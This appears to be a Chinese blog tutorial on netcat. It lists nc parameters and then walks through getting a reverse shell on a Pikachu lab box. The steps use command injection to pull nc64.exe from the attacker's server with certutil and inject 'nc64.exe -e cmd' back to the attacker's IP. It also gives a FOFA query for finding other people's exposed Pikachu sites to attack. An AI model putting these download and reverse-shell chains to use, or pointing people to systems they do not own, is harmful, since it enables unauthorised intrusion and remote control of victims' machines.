简介:nc瑞士军刀,通常被称为netcat或简称nc,是一个被誉为网络安全界的“瑞士军刀”的实用工具。它利用TCP或UDP协议的网络连接来读写数据,具有多种强大的功能,使用也相对简单,只需两台装有nc的PC,就可以进行各种网络操作。例如,通过监听特定端口,可以实现电子取证PC与电子取证设备之间的通信和数据同步。
下面是nc的常用参数
-d | 后台执行 |
-e prog | 程序重定向,一旦连接,就执行 |
-g gateway | 源路由跳数,最大值为8(source-routing hop point[s],up to 8) |
-G num | 源路由指针:4,8,12,… (source-routing pointer: 4,8,12,…) |
-h | 查看帮助信息 |
-i secs | 延时的间隔 |
-l | 监听模式,用于入站连接 |
-n | 指定数字的IP地址,不能用hostname |
-o file | 记录16进制的传输 |
-p port | 本地端口号 |
-r | 任意指定本地及远程端口 |
-s addr | 本地源地址 |
-u | UDP模式(netcat-1.15可以:远程nc -ulp port -e cmd.exe,本地nc -u ip port连接,得到一个shell. ) |
-w secs | 指定超时的时间 |
-z | 将输入输出关掉——用于扫描时 |
-v | 详细输出——用两个-v可得到更详细的内容 |
前提条件:两台主机之间可以通信,并有一个可供目标站点下载的netcat,如果是云服,需要将控制端防火墙白名单开启。其中实操涉及:远程命令执行&文件上传&反弹shell
(就是自己需要搭一个网站,可使用phpstudy,直接把文件放在www下面就可以直接下载了)
一、将nc文件传入受害主机
首先:我们拿搭建好的pikachu靶场做测试,利用远程命令执行漏洞传入我们事先准备好的nc文件,没有搭建的话可以在fofa上面借用别人的靶场(切记,不要瞎整哈,容易包吃住)
fofa搜索:"pikachu" && country="CN" && title=="Get the pikachu"
文件上传命令:certutil -urlcache -split -f http://自己搭建网站的IP或域名/nc64.exe
二、控制端做反向连接,首先在控制端启动监听
在攻击机上执行nc64.exe -lvvp 8888命令监听本地的8888端口
三、目标机器做正向连接至控制端
把受害主机的cmd终端发送至攻击者主机ip的8888端口,这种连接方式使得控制端能够接收来自受控端的连接,即使受控端的网络环境限制了其主动发起连接的能力
命令:127.0.0.1&&nc64.exe -e cmd 1.1.1.1 8888(这里IP用1.1.1.1代替,实际填写自己的IP)
四、到这里使用nc的反弹shell就成功啦,可以直接在终端执行相关的命令对受害主机进行操作啦
ps:需要注意的是,不要反弹shell成功后做一些没有意义的操作,咱们要做遵纪守法的人,群众里会有坏人,但那个人不能是咱们